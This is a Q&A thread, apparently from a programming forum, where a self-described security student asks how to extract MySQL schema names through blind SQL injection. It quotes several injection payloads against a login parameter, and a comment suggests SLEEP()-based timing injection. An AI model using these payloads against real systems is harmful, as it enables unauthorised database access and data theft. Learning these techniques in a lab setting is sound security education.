# Blind SQLInjection with MySQL Tables

Tags: mysql, sql, schema, sql-injection, code-injection

I am developing a script to execute a SLQInjection attack against MySQL databases. This script already gets the username and the hostname. However, I don't know how to get the values of a table.

Let's put an example. I want to get the schemas in the MySQL with this sentence:

```
 SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
```

The attack that I was perfoming was something like this:

```
usuario=admin' AND $ascii_value<ASCII(substring(user(),$i,1)) and '1'='1
```

By this way, I run over username to get its ASCII values. Obviously, if I try to combine both expressions:

```
usuario=admin' AND $ascii_value<ASCII(substring((SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA),$i,1)) and '1'='1
```

I got nothing. Well, may be there are two schemas, so let's get the first one at least.

```
usuario=admin' AND $ascii_value<ASCII(substring((SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY SCHEMA_NAME DESC LIMIT 0,1),$i,1)) and '1'='1
```

It doesn't works again. How can I extract, for example, schema names in a blind sqlinjection attack?

Thanks!!

Comment: stackoverflow is not meant to get answers for hacking attempts.. So you should ideally be stateing for what you are going to use this for.

Comment: I am a student of a security degree. I'm not going to hack the whitehouse :)

Comment: Off topic: If you want to do blind injections your best bet is to use MySQL `SLEEP()` function to a high number that way you can see more easy if the blind injection workt or not by looking in the response times..

Comment: Well, that is helpful, thanks! I'm going to try this way :)

Comment: Wait never mind mine last example you are trying to "bruteforce" geuss the database name(s) on what the current user has access to.

Comment: Here https://www.db-fiddle.com/f/761MDfRnrvAnS2ZaQSHaFC/5 is a example how you can blindly can "bruteforce" the database name length might be usefull.. Study it iam pretty sure you can get it working to bruteforce the database name instead.

Answer (score 0):

Check out my SQL Injection Anywhere whitepaper that will show different binary blind SQL injection technique, not based on a WHERE clause but on other parts of the SQL query:
http://www.quotium.com/content/uploads/2005/01/SQL-Injection-Anywhere-White-Paper.pdf

In addition, if I came across a problem like the one you mentioned, I'd build a MySQL DB, populate it with data and try to execute your payload. Obviously there is either a syntax error or most likely a business logic short circuit error somewhere.

Good luck